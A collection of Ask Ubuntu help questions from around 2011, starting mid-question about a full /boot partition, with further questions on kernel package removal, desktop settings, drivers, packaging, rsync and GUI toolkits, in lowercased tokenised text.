8288075 2011-09-29 06:37 initrd.img-2.6.32-34-server drwx -- -- -- 2 root root 12288 2011-05-18 11:46 lost+found/ -rw-r -- r -- 1 root root 160280 2010-03-23 03:40 memtest86+.bin -rw-r -- r -- 1 root root 2179117 2011-03-01 19:02 system.map-2.6.32-30-server -rw-r -- r -- 1 root root 2179628 2011-04-08 17:07 system.map-2.6.32-31-server -rw-r -- r -- 1 root root 2178240 2011-04-20 16:53 system.map-2.6.32-32-server -rw-r -- r -- 1 root root 2178382 2011-07-29 16:07 system.map-2.6.32-33-server -rw-r -- r -- 1 root root 2178952 2011-09-13 18:00 system.map-2.6.32-34-server -rw-r -- r -- 1 root root 2179333 2011-10-11 11:10 system.map-2.6.32-35-server -rw-r -- r -- 1 root root 1336 2011-03-01 19:08 vmcoreinfo-2.6.32-30-server -rw-r -- r -- 1 root root 1336 2011-04-08 17:13 vmcoreinfo-2.6.32-31-server -rw-r -- r -- 1 root root 1336 2011-04-20 16:54 vmcoreinfo-2.6.32-32-server -rw-r -- r -- 1 root root 1336 2011-07-29 16:08 vmcoreinfo-2.6.32-33-server -rw-r -- r -- 1 root root 1336 2011-09-13 18:03 vmcoreinfo-2.6.32-34-server -rw-r -- r -- 1 root root 1336 2011-10-11 11:11 vmcoreinfo-2.6.32-35-server -rw-r -- r -- 1 root root 4111552 2011-03-01 19:02 vmlinuz-2.6.32-30-server -rw-r -- r -- 1 root root 4113344 2011-04-08 17:07 vmlinuz-2.6.32-31-server -rw-r -- r -- 1 root root 4106528 2011-04-20 16:53 vmlinuz-2.6.32-32-server -rw-r -- r -- 1 root root 4107648 2011-07-29 16:07 vmlinuz-2.6.32-33-server -rw-r -- r -- 1 root root 4108960 2011-09-13 18:00 vmlinuz-2.6.32-34-server -rw-r -- r -- 1 root root 4111040 2011-10-11 11:10 vmlinuz-2.6.32-35-server i was able to find the old kernel packages like so : phrogz @ planar : /boot $ dpkg -l | grep linux-image ii linux-image-2.6.32-30-server 2.6.32-30.59 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-31-server 2.6.32-31.61 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-32-server 2.6.32-32.62 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-33-server 2.6.32-33.72 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-34-server 2.6.32-34.77 linux kernel image for version 2.6.32 on x86 if linux-image-2.6.32-35-server 2.6.32-35.78 linux kernel image for version 2.6.32 on x86 iu linux-image-server 2.6.32.36.42 linux kernel image on server equipment . …and i can see that many of them are older than my current image : phrogz @ planar : /boot $ uname -a linux planar 2.6.32-34-server # 77-ubuntu smp tue sep 13 20:54:38 utc 2011 x86_64 gnu/linux however , i ca n't actually remove them due to an unmet dependency : phrogz @ planar : /boot $ sudo apt-get -- purge remove linux-image-2.6.32-30-server reading package lists ... done building dependency tree reading state information ... done you might want to run `apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-image-server : depends : linux-image-2.6.32-36-server but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . but i ca n't fix the dependency ( presumably due to low disk space ) : phrogz @ planar : /boot $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : liblcms1 linux-headers-2.6.32-32-server libnspr4-0d linux-headers-2.6.32-33-server linux-headers-2.6.32-32 linux-headers-2.6.32-33 linux-headers-2.6.32-34 libcups2 tzdata-java libjpeg62 linux-headers-2.6.32-34-server libavahi-client3 ca-certificates-java libnss3-1d use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-2.6.32-36-server suggested packages : fdutils linux-doc-2.6.32 linux-source-2.6.32 linux-tools the following new packages will be installed : linux-image-2.6.32-36-server 0 upgraded , 1 newly installed , 0 to remove and 8 not upgraded . 3 not fully installed or removed . need to get 0b/31.8mb of archives . after this operation , 128mb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 145200 files and directories currently installed . ) unpacking linux-image-2.6.32-36-server ( from ... /linux-image-2.6.32-36-server_2.6.32-36.79_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-2.6.32-36-server_2.6.32-36.79_amd64.deb ( -- unpack ) : failed in buffer_write ( fd ) ( 10 , ret=-1 ) : backend dpkg-deb during `./boot/vmlinuz-2.6.32-36-server ' : no space left on device dpkg-deb : subprocess paste killed by signal ( broken pipe ) running postrm hook script /usr/sbin/update-grub . generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.32-35-server found linux image : /boot/vmlinuz-2.6.32-34-server found initrd image : /boot/initrd.img-2.6.32-34-server found linux image : /boot/vmlinuz-2.6.32-33-server found initrd image : /boot/initrd.img-2.6.32-33-server found linux image : /boot/vmlinuz-2.6.32-32-server found initrd image : /boot/initrd.img-2.6.32-32-server found linux image : /boot/vmlinuz-2.6.32-31-server found initrd image : /boot/initrd.img-2.6.32-31-server found linux image : /boot/vmlinuz-2.6.32-30-server found initrd image : /boot/initrd.img-2.6.32-30-server found memtest86+ image : /memtest86+.bin done errors were encountered while processing : /var/cache/apt/archives/linux-image-2.6.32-36-server_2.6.32-36.79_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i free up space on /boot so that i can fix my dependencies ? should i just delete the files manually ? and then , should i resize my /boot to be larger , so this does n't happen again ? if so , how ? if not , what maintenance should i be running regularly to prevent the accumulation of this cruft ?
84912	stop dpkg -l from listing packages already removed	as the solution to another problem i was forced to use dpkg -- remove to uninstall a package . however , after i do this the package is still listed in dpkg -l : phrogz @ planar : /boot $ dpkg -l | grep linux-image-2 ii linux-image-2.6.32-30-server 2.6.32-30.59 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-31-server 2.6.32-31.61 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-32-server 2.6.32-32.62 linux kernel image for version 2.6.32 on x86 phrogz @ planar : /boot $ sudo dpkg -- remove linux-image-2.6.32-30-server ( reading database ... 141902 files and directories currently installed . ) removing linux-image-2.6.32-30-server ... running postrm hook script /usr/sbin/update-grub . generating grub.cfg ... [ ... ] done phrogz @ planar : /boot $ dpkg -l | grep linux-image-2 rc linux-image-2.6.32-30-server 2.6.32-30.59 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-31-server 2.6.32-31.61 linux kernel image for version 2.6.32 on x86 ii linux-image-2.6.32-32-server 2.6.32-32.62 linux kernel image for version 2.6.32 on x86 phrogz @ planar : /boot $ sudo apt-get -- purge remove linux-image-2.6.32-30-server reading package lists ... done building dependency tree reading state information ... done package linux-image-2.6.32-30-server is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . how can i 'clean house ' so that dpkg-l no longer lists these older , non-existent packages ?
84929	how to set up dolphin as default file manager ?	i 've recently came back to ubuntu from kubuntu , but i really like dolphin . is there any way how to set it up as default file manager ?
84934	how do i rename photos based on their shotwell titles ?	i recently gave ~200 photos numerical titles in shotwell which describe their sequences -- 001 , 002 , etc . but i 'd like for this sequence to be the same in the filenames , too , so that when i open the folder in nautilus the photos are listed in order . i think shotwell saved the title in the exif data somewhere . in fact , i finally found it using the gnome image viewer , under xmp other and photoshop : headline . what i 'd like is a way to read these shotwell titles and have those used as the filenames . i could probably do this with python if i knew how to access that metadata .
84936	what is the < number > ! in byobu 's status bar mean ?	i run byobu on my home server , and i noticed this today - what is it ? it 's part of the byobu notification/status bar , on a 64-bit 11.10 server .
84937	how to make unity remember brightness settings ?	this question has been asked many times for ubuntu 11.10 but it always has been closed and linked with this link , but that accepted answer is from 2010 and that setting does n't work anymore for ubuntu 11.10 . furthermore , the brightness setting does n't exist anymore in `` energy '' options . it is now on `` screen '' options and it does n't seem to remember the setting after reboot . so , how to make unity remember brightness settings ?
84938	how do i package my application for the ubuntu software centre ?	i 'm an old hand at software development , but not so experienced with packaging . i 've built one dpkg before , but it was n't a source package . i 'm working on getting an application submitted to the ubuntu app store . the documentation on packaging is a bit on the vague side , saying not much more than that it needs to be packaged in the `` debian source package format '' : http : //developer.ubuntu.com/publish/my-apps-packages/ i 'm sure i could muddle through putting a debian source package tarball together , but there are a few things i wonder about : how is the 32-vs-64 bit thing handled ? do they take source and build apps from both ? how is supporting different versions of ubuntu handled -- 10.04 , 10.10 , 11.04 , 11.10 , etc ? how are dependencies handled . if , for instance , my app depends on sdl , how do i specify that ? if i do n't want to distribute source code for my application ( which is a proprietary license ) , is there a clean way to indicate that source should n't go with the app ? if i 'm not using autoconf/automake , does my makefile need to be set up in a particular way , or are the autotools required ? i imagine that the ubuntu folks probably take the source and build it for each of the different platforms and architectures that they support buying apps for , but since there 's no apparent way in the submit process to indicate what the app runs with ( i.e . requires gtk3 and 64-bit support , or intel-only with no arm support ) , i can only hope that stuff can be specified in the source format . is there any good , thorough documentation specifically on source package creation you can point me to ?
84947	ubuntu 11.10 not booting after full install	i have downloaded and installed the .iso file on a cd using imgburn , after which i chose the full installation , erasing everything else on my drives ( including windows 7 ) . the installation process went down without a hitch . however , when the program tells me the installation is finished and i should reboot the computer and do so , i get a black dos-style screen with a lot of lines with [ ok ] behind , and it stalls on 'checking battery charge ' or something similar . i have given it several attempts , all with the same result . i am sure i have followed the instructions during the installation process to the letter , so i am at a loss what is going wrong . i would appreciate any help anyone could give me . thanks in advance .
84949	application menus file , view , etc missing in gnome-fallback	i installed ubuntu 11.10 and i like it but gnome 3 slows my pc too much so i 'm trying to use the gnome-fallback which is a bit faster . so far everything works like gnome 2 except that the application menus are not showing in any application nor even nautilus and i hope there 's a way to fix this . sorry for my bad english .
84954	hide user list from logon page in ubuntu/xubuntu 11.10	i 'd like to add a little bit more security on my laptop that is running ubuntu 11.10 with xfce environment . the problem is that once the computer is turned on a list of users is displayed for me to click on and enter the password ; i would like to disable this and have it ask for the username and password instead . thank you .
84959	how do i get a ralink rt3060 wireless card working ?	i am new to linux . i was using fedora and now switching to ubuntu for a try . on fedora my wireless network card was working ok from the os install ( i didnt had to do anything for it to work ) on ubuntu , with the lspci -v command , i get : network controller : ralink corp. rt3060 wireless 802.11n 1t/1r subsystem : ralink corp. rt3060 wireless 802.11n 1t/1r flags : bus master , slow devsel , latency 64 , irq 20 memory at fe9e0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci kernel modules : rt2800pci but i am not able to find any wireless network . what to do now ? thanks
84960	can i recover from corrupted debconf in place ?	my file system recently experienced multiple failures . an fsck from an old live cd i had laying around ( hardy ) was able to repair things enough that i could boot my system ( xubuntu 9.10 i think ) but there 's now lots of missing files causing random things to fail . i attempted to reinstall some of the packages that are missing files but turns out debconf is one of those ! in particular it seems to be missing several perl files in the /usr/share/perl5/debconf/ path . short of doing a full reinstall ( i 'm downloading 11.10 as i type this ) , i thought it might be an interesting exercise to find out if there 's a way i can recover this system in place ( that is , without resorting to a full reinstall ) . wired and wireless internet access are both still working and able to fetch packages , i just ca n't do anything with them currently . when synaptic first failed , i fell back to using apt-get but that did n't help any . is there even lower level package management scripts i could use ? my knowledge of handling .debs does n't go much beyond the basics of installing/updating/etc via apt-get or a wrapper like synaptic .
84965	how do i import a windows vista user account on my partitioned drive ?	while i was installing ubuntu it asked if i wanted to import a user from vista . i chose one but i do not know how to get to it or if it even was imported .
84967	ubuntu 11.10 on laptop random restart	laptop info : memory 992.6 mib processor intel core duo cpu t2350 @ 1.86 ghz x2 graphics unknown ( point of concern ) os type 32-bit acer travel mate 4200 ~~~~~ so i updated it recently but i 'm still concerned that i jumped the gun in updating to 11.10 when i should rely on 10 . i had recently updated from 10 to 11.10 , complete install over on top of the old dang version cause some update messed it up . yet , my concern was after installing 11.10 and before updating the fresh os , it had randomly restart/reboot . also , one time it lost control on the touch pad randomly in use ( i tried using keyboard functions to turn it back on but nothing ) one last concern is as mentioned the graphics is not recognized , no driver support atm . currently update 11.10 and appears stable , but i 'm not relying on it yet as i think i may need roll back . lastly , when i did a memory test overnight , i checked in the morning , it was still running and no response of any-sort to any key-presses . with the above mentioned noticed factors any explanation ? i 'm willing to provide more info , just tell me specifically what , i 'm no linux expert but i 'm competent when it comes to troubleshooting .
84968	notification extension - gnome shell	on linux mint 12 , there 's a extension for `` important '' notifications to be put in the panel . ie . dropbox would be put up in the panel . is there an extension for ubuntu that does that ? i have searched the gnome repos and other third party ppas and i have n't been able to find it .
84976	i installed 10.04 on my laptop , and the internet is gone	so i just installed 10.04 onto my toshiba l745d-s4220 laptop . i installed it with a wired connection and it installed fine , but noticibly never asked for any internet connection settings when i installed . so i restart , and there is no connection , even though it is plugged into ethernet and i know that there are many strong wifis around the area . i tried ifconfig -a , it sees the ethernet connection . i tried iwconfig and it says that there are no connections available . it seems that there are no drivers that installed for connecting up to any sort of internet . help !
84978	alltray only works once in gnome 3 shell	when i log in i want wunderlist open minimized at system tray . it works but only once . when i click wunderlist or any other program that was minimized at tray with allray , the program window opens , like should happen , but when i do it again does n't work and the program window disappears . i will like solve this problem , if its possible before try other alternatives . i have ubuntu 11.10
84981	where to see the available apps to use ?	( using freshly installed ubuntu 11.10 ) i know this is a totally ignorant question , but i ca n't seem to find any menu in which to see available applications that i may want to use . for example , i know i have gimp installed but where do i go to open it ? is there anything like the start or orb ( vista/win7 ) menu ? i know this has to be simple as pie but i ca n't seem to find it . do i open the ubuntu software center on the windows sidebar looking thing on the left of the desktop and click `` installed '' ? please tell me this is not the place , it 's horribly un-intuative .
84996	migrating thunderbird profile from windows 7 to ubuntu	i 'm very new to this . i 've trawled the forums to try to find out how to set up thunderbird in ubuntu and transfer my existing profile from windows but i ca n't work it out . please help . step-by-step instructions like you 're talking to the impaired ( because you are ) would be most appreciated .
84998	why ca n't i set screen brightness ?	i have an hp pavilion g6 and ca n't adjust the brightness . i have specific buttons for this on my keyboard , but they are not working . tried in system settings too , but even if i change the brightness there nothing is happening . tried through the terminal too but it did not work . any ideas anyone ?
84999	what do the paranthesis and $ sign mean in echo $ ( ls )	the output of # ls and # echo $ ( ls ) are the same . what exactly does the $ sign and the parenthesis mean ? also , what is going on a technical level that causes the output of these two commands to be the same ?
85007	pulseaudio : can not create sink with specific name anymore	since having upgraded to oneiric i can not create a sink in pulseaudio with a specific name . usually i did it using this command : pactl load-module module-null-sink sink_name=test but now i get a sink with out the specified name . all sinks created are named âťnull-sinkâť and it does not seem to be possible to rename a sink . is this a bug in pulse ?
85011	can i change the keyboard shortcut for copy & paste ?	recently i switched to a dvorak keyboard layout & wish to change the current key combination for copy & paste from ctrl + c , v to ctrl +j , k to allow more ease of use .
85014	unable to install applications in ubuntu software center	i try to install apps on software center and nothing happens it does'nt ask me to enter my password or anything when i click install it so annoying > <
85017	what program do i use to open the .iso file i download to use for installing ubuntu ?	i was able to get unetbootin and be able to download ubuntu on a usb stick and use the live version . i 'm still trying to figure out why wubi will not work . when i try to download the .iso , firefox asks me which program to use to open it with . i 'm not sure what to do from there .
85018	root password required for driver installation	i have used various linux distributions in the past . thought i would maybe get back into it . so i chose ubuntu and began setting up my hardware . i was installing a lexmark printer driver when suddenly it requested the root password . i entered `` root '' as that is what the root password in linux has always been . im going back 20 years . anyway i 've got this installation prompt for password sitting on the back burner while i search the net for the default root password . i ca n't seem to find it anywhere . i stead i find somebody stating that ubuntu does n't release the password so we ca n't muss things up . is this true ? please tell me it is n't so . in my mind that goes away from everything that linux is , or was .
85022	wubi installed ubuntu 11.10 wont boot	after reboot ( which wubi prompted me to do ) i choose ubuntu and a few lines of code and i press escape and choose normal mode , the screen fills with code i then get a blinking cursor for about 30 seconds the cursor goes away and the screen is blank ( the same thing happens when i choose other modes ) i normally run windows xp p.s . this is my first time trying to use ubuntu so i guess im a noob
85029	sync local web server with remote web server	hi i 'm looking for a tool to synchronize files from my local web server to remote web server . i 've been using since a few of years the ( site publisher ) with wine , but i 'm looking for a free alternative that integrates naturally with ubuntu ( a linux aplication ) . i would like the tool had gui like meld , which could have a list of files / directories to ignore , that i can choose which files or directories you want to replace at the time of synchronization , in few words something like the site publisher mention that before .
85033	device browse using bluetooth not working in ubuntu 11.10	i had been using bluetooth device browse using my system ( dell inspiron 1525 ) and my mobile ( nokia 6233 ) in ubuntu 10.04 . yesterday i installed 11.10 . bluetooth , send file option , detecting devices , etc . all are working properly , but the browse option is n't . the application is not crashing or anything , but nothing happens when you click the browse option . i tried running blueman-browse from the terminal , but then i got an error that could not parse arguments : unknown option -- browser . when i checked the nautilus man page , it had a -- browser option , but when i tried running nautilus -- browser from the terminal the same errors as above itself was coming . as the browse device option usually opens the mobile filesystem in nautilus , i thought that this missing -- browse option might be the reason for this issue . any idea ?
85037	where can i find vmware tools 8.7.0 ?	i have a vm installed using vmware workstation 7.1.4 build-385536 running ubuntu 11.10 . i 'm trying to install vmware player on this ubuntu vm : gksudo bash vmware-player-4.0.1-528992.x86_64.bundle but i get an error telling me to install version 8.7.0 of vmware tools : my question is where can i find vmware tools 8.7.0 ?
85041	how to enable desktop effects on my ubuntu 11.10 ?	i installed ubuntu 11.10 yesterday , and have been struggling with enabling desktop effects for hours . i downloaded the compizconfig settings manager , and tried selecting-deselcting various items . but they do n't seem to be taking effect . please help . thanks . vga : 00:02.0 vga compatible controller : intel corporation 82946gz/gl integrated graphics controller ( rev 02 ) edit : new problem ! i made a few changes in compizconfig settings , and a few effects started working . like wobbly windows , and rotating cube . then i tried enabling a few application switchers , and it asked me to resolve the conflicts . i guess one of them was `` enable opengl '' . as i clicked it , everything crashed . dock vanished . i only a see one bar at top with menus file , edit , .. , bookmarks , help . i am not able to access anything else . [ alt ] + [ f2 ] and [ super ] , both are not working . what do i do ? please help ! ( right now i am accessing web via a guest account . to get any work done , i have to be able to use my own account again . )
85043	unable to activate 3d effect in ubuntu 11.10 dell studio laptop	i have dell studio with a ati 1 gb dedicated graphics card , i am running ubuntu 11.10 . i have also installed compiz configuration package . once i select necessary options in compiz i am running the command unity -- reset , i will get the 3d effects as long as the terminal is open once i close the terminal , every thing will be messed up and even i will lose the 3d effects .
85051	no login sound on startup	when i start my ubuntu 11.10 , no login sound is heard . all the settings are the normal and i can hear the audio but no log in sound on startup . what to do ?
85054	lubuntu keyboard problem	i have installed lubuntu 11.10 for it 's much lighter than ubuntu itself with unity , but i have serious problem . i need to put another keyboard layout- bulgarian , but i simply ca n't do it . tried a lot of things but ca n't figure out how to do it . please help me for it 's important . : ) thanks !
85056	is pygtk still relevant ?	i 'm new to linux but not to app development . i come from a realbasic on a mac background . i 've accepted that i need to learn a new language to develop for linux ( since rb wo n't run on 64 bit distros and is a cloed proprietary language ) but i want to make sure i pick the right one . i 've been looking at python and was all set to go until i read that pygtk is becoming obsolete with the introduction of gtk 3 . is this true ? the ubuntu developer website stills seems to recommend it with glade for the ui but i want to make sure that i do n't learn something that 's on the way out !
85059	ubuntuone not synching	ubuntuone worked and all my folders were synced ( ~8 gb ) . currently ubuntuone shows only 4.7gb synced . then i had to re-install ubuntu from scratch ( 11.10 ) . since then i can not mark folders as `` synchronize this folder '' . i right-click on my folder in my home folder and choose `` ubuntoone > synchronize this folder '' . but it does not do anything . it does not show any of the sync status available '' not synchronized '' '' synchronizing '' '' synchronized '' nor the correspondent symbols either after that . i tried on several folders and .
85061	display problem in notepad++ v5.9.6.2 ( wine 1.3.34 )	i have been encountering a display issue for about 2 months when using notepad++ with wine on ubuntu 10.04 . it happens not only in the display results panel , but also in the editor panel . does any of you have this problem ? do you know how to fix it ? thanks !
85063	wifi is slower than in windows	the built-in wifi network adapter in my netbook works fine in windows , but in ubuntu it is much slower , to the point where the web is hardly usable . why might this be ? i 've tried using an external wifi adapter instead , but without luck . i 've posted my network info here .
85065	how to lock touchpad while typing	i 'm using ubuntu 11.10 on dell inspiron n5110 . as the touch pad is a bit large in this model it’s frequently getting in my way while typing . although i try my best to not touch it , the cursor still gets moved and ruins what i am typing . i remember an option in the `` mouse and touchpad '' utility which let us lock the touchpad while we are typing but i could n't find that option in this utility now . any clue ?
85071	problems migrating virtualbox vm from one ubuntu server to another	i have recently bought a new faster server and so i want to start migrating things over to the new server . having my email server ( zimbra ) installed in a virtual machine i figured it should be piece of cake , just move the .vdi , configure the new vm and enjoy the improved performance . unfortunately i get a kernel panic on the new box when trying to boot : any ideas on what could be causing this ? could it be related to new host being 64-bit ? some info on server1 ( working ) : virtualbox version : 3.2.12r68302 uname -a : linux server1 2.6.32-34-generic-pae # 77-ubuntu smp tue sep 13 21:16:18 utc 2011 i686 gnu/linux some info on server2 ( not working ) : virtualbox version : 4.1.6r74727 uname -a : linux server2 2.6.32-33-server # 72-ubuntu smp fri jul 29 21:21:55 utc 2011 x86_64 gnu/linux
85077	how to organize music files ?	i 'm trying to re-organize my music files . i copied them from my ipod before it died , so they have funky names , like dgedh.mp3 . i tried using a windows utility to rename them from their id3 tags , but it did n't work very well -- it created a bunch of folders ( one for each album in theory , but more like 7 or 8 in reality ) and renamed the files with non-english characters . most of the files are mp3s , but there 's at least one or two other file types as well . i 'd like to copy them to a new folder and try a ubuntu utility to rename and re-organize them . in windows , this would be straightforward -- i 'd use the search function ( with no file name specified ) to list all of the files in the main folder and its subfolders , then drag and drop them to the new folder . what 's the easiest way to accomplish the same thing in ubuntu ? the gui search does n't seem to accept wildcard characters , and i do n't remember all of the file types i have , so it 's not as simple as searching for `` mp3 '' . many thanks !
85080	how to compile a unity scope ? ( or : how to use libraries in vala ? )	i 'm currently learning vala , and after going through the basics i wanted to do an actual small project to make it more fun . for this , i thought creating a scope for unity would be perfect ( in this case , a scope for the music lens to search mpd ) . however , documentation on doing something like this is sparse . therefore , i hope to be able to put together a tutorial on writing a scope in vala by first going through it myself with the help of ask ubuntu . what i 'm currently stuck on , is how to compile my scope in such a way that i can use unity 's library . i 've installed libunity-dev ( was this necessary ? ) , however , when i try to compile it , i get the following error : $ valac -- pkg libunity ./unity-scope-mpd.vala error : package `libunity ' not found in specified vala api directories or gobject-introspection gir directories compilation failed : 1 error ( s ) , 0 warning ( s ) ( note : i have experience in programming in java and php , but have n't done large projects in the former , so please take that into account in an answer . )
85082	still can not run unity on my laptop ( nvidia optimus ) ?	when i had installed 11.04 due to my gpu 's optimus technology , my laptop could not fully run unity . i thought that with 11.10 release this would be covered . when i run nvidia x server i see this message : you do not appear to be using the nvidia x driver ... but when i 'm running additional drivers application i get this : this driver is activated and currently in use . ( which did not happen before ) additionally , after executing this command at the terminal i got this : /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context so what is wrong ? : s thank you for your time .
85086	detachable menus in gvim are not clickable	you can detach the menus in gvim with the scissors symbol . this works , but i can not click any of the items then . is there a way to fix this ?
85088	git branch in zsh prompt ?	when working on a git repository with multiple branches , how do i modify my zsh prompt to include my current active branch ?
85093	how to remove ubuntu from mac ?	i installed ubuntu and linux mint into my mac . i want to remove it because i gave it too less space . now , i do n't know what to do now .
85102	problem with external hard disk	i 'm experiecning a problem with my external hard disk . when i plug my hdd in ubuntu it works . when i plug it in windows , it also works . but when i transfer files from ubuntu to hdd and then trying to acess them from windows , no matter how i try , i get error messages . and when i 'm able to acess them i can not cpoy , or delete them through windows . they can only be modified through ubuntu . i gave my hdd to a friend and she could n't copy a folder i had created using ubuntu . when i checked it using windows 7 , i clicked on the foldres ' properties , and i saw that the `` read-only '' box was checked . i unckecked the box , but nothing . only ubuntu could modify the files in the folder , and copy or delete them from the hdd . how can i prevent ubuntu from making my files `` read-only '' for windows ?
85105	screensaver settings	hello , world . i recently installed ubuntu 11.10 . i had been using 10:10 , and did a reinstall to start fresh on this new version . the thing is i encountered myself with more than a few diferences , mostly in settings . now i ca n't seem to find the means to configuring my screensaver . 多where are screensaver settings ? best regards , esteban
85107	java programs can not be relaunched from launcher side bar	i run a java program ( smartgit for example ) . what i see in the launcher is just a question mark . marking the `` keep in launcher '' does n't open the app . it just blinks for several seconds and stops blinking ( no app is launched ) . i even created a launcher file ( .desktop ) and also did not work . i followed this but did not help . ( defined startupwmclass in the launcher file ) it seems that the side bar icon does not even point to the launcher file , because after enabling the terminal , the terminal is shown when running from the command line or nautilus but not when running from the launcher . here is the content of the launcher file ( perhaps this will help ) : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false icon [ en_us ] =/home/alik/apps/smartgit-2_1_6/bin/smartgit-48.png name [ en_us ] =smartgit exec=/home/alik/apps/smartgit-2_1_6/bin/smartgit.sh name=smartgit icon=/home/alik/apps/smartgit-2_1_6/bin/smartgit-48.png # startupwmclass=sun-awt-x11-xframepeer # startupwmclass=smartgit
85109	how do i theme the xscreensaver unlock screen ?	how can i replace ugly screensaver unlock screen in xubuntu 11.10 ? standard xscreensaver is very ugly . is there any themes for unlock screen ?
85110	disable `` alt+` '' shortcut	in some applications i need to use `` alt+~ '' shortcut ( which switch windows within one application ) , and i do n't need it as global shortcut . how i can disable it forever ?
85117	have to plug/un-plug usb devices on system booting ?	it 's so weired that i have to plug/unplug in my usb devices every time booting ubuntu . it happens for both installing ubuntu and booting ubuntu ( 10.10 and 11.10 ) the scenario is like : 1.bios checking - > 2.grub start - > 3.keyboard & mouse led off ( black screen with a cursor on top-left ) - > 4.i plug/unplug in any usb devices - > 5.everything is back to normal and ubuntu started it 's really frustrating : ( please advise the solution .
85118	how to update ubuntu without problems ?	ubuntu constantly offers me number of updates . but it takes lots of my time to review such offers to find relevant updates ( for example , if i am not interested in kernel updates ) . second , it almost always causes new problems . i like new features , but i also like my settings and i really hate ubuntu if after update it starts into a text-mode shell , with sluggish responsiveness , does n't mount my nfs folders , etc . and there is no easy way to revert changes ! maybe i do n't understand something ? please , help me if you know : is it possible to see only offers to update only those packages , which i specify in a list ? for example , if i am not interested in any other update , but only in firefox ? is there a way to see what problems will it make before i start any update ? is there a way to revert changes automatically if i do n't like the state after an update was done ?
85119	adding options ( right-click ) to icons on gnome-shell dock	unity introduce a new costumization to the icons that consist on a little piece of code for the .desktop of the file , and then , when righ clicking on the icon on the unity dock , the options you define appears ... i wish to know if that could be done with the gnome-shell dock icons so i could have only the white libreoffice icon and then set the options to execute writer impress etc ... thanks in advance
85124	installer do n't detect any partition on drive	i want to install ubuntu 11.10 x64 on my system ( msi p67a-c43 b.3 ) and a western digital 1,5tb sata2 ( connected to sata2 controller ) , but the installer do n't detect any partition on this drive . really there is an ntfs partition that uses whole disk , and there are 400gb of data on this partition . even if i have reduced the size of this partition of about 100gb , the installer did not detect any partition and reports that drive is empty . i 've also tested 11.10 x32 edition , also linuxmint 12 have the same problem . also i 've tried to use gparted whithout success . this drive was partitioned and formatted within windows 7 . there are other hard drives , but i 've disconnected all except this before booting from usb flash disk ( made by tool that offer pendrivelinux ) . how can i install ubuntu on this hard drive ? thanks to all and excuse me for my english .
85127	uninstall ubuntu 11.10 / install linux mint 12	i 'd like to switch my system to linux mint . for that purpose i made a live usb drive to boot from . however when booting i 'm not asked from what to boot . ubuntu is just being loaded , and then it does n't work properly . do i have to uninstall ubuntu first ? if so , how ?
85129	copying code directly into the console with keyboard shortcuts	i am have installed ubuntu 10.04 right now , and i am getting quite a bit of code examples from my browser , firefox , where the usual ctrl-c short cut works but it does n't seem to work for pasting the code directly , ctrl-v , into the shell console . this is n't a critical issue , pasting with the mouse still works , but any suggestions as to how to activate ctrl-v or what the correct native short-cut for the console is would be great .
85137	rsync not actually copying files	i 'm trying to synchronize a large directory of files from my server to a local box . ( both are running ubuntu . ) i have a command that looks like it works , but certain files are not copied : phrogz @ planar : ~ $ cat ./sync-phrogz-public rsync -rztpl -- stats -- rsh=/usr/bin/ssh 69.46.18.236 : /var/www/phrogz.net/public /var/www/phrogz.net/public phrogz @ planar : ~ $ ./sync-phrogz-public number of files : 10320 number of files transferred : 0 total file size : 4221864770 bytes total transferred file size : 0 bytes literal data : 0 bytes matched data : 0 bytes file list size : 197778 file list generation time : 0.001 seconds file list transfer time : 0.000 seconds total bytes sent : 388 total bytes received : 199213 sent 388 bytes received 199213 bytes 79840.40 bytes/sec total size is 4221864770 speedup is 21151.52 phrogz @ planar : ~ $ la /var/www/phrogz.net/public/svg/convert* -rw-r -- -- - 1 phrogz www-admin 6404 2011-02-26 21:49 /var/www/phrogz.net/public/svg/convert_path_to_polygon.xhtml phrogz @ planar : ~ $ ssh 69.46.18.236 'ls -fla /var/www/phrogz.net/public/svg/convert*' -rw-r -- r -- 1 phrogz phrogz 1951 2011-12-04 09:07 /var/www/phrogz.net/public/svg/convert_matrix.html -rw-r -- r -- 1 phrogz phrogz 6404 2011-02-26 21:49 /var/www/phrogz.net/public/svg/convert_path_to_polygon.xhtml as you can see , the file convert_matrix.html did not get copied . what is the command doing , if not actually copying files ? how do i get it to actually copy the files ?
85144	what 's the difference between gtk and qt ?	please bear with me as i 'm a newcomer to linux . i 've been writing gui programs in realbasic on a mac for several years . i 'm trying to learn python and i want to write gui apps for linux ( primarily ubuntu and mint since they are the distros i have access to and they seem to be the most popular ) . i basically have three questions : are there any significant differences between gtk and qt i 've toyed with quickly and glade on ubuntu but i understand that they are based on gtk 2 and this is now obsolete . is that correct ? are there any all-in-one editors that let me design a gui and then add python code to it ? ( for instance , add a button to a window in the editor , double click the button and then add the python code that is to execute when the button is pressed ) sorry if these are really dumb questions but i want to start learning the 'right ' tools from the start .
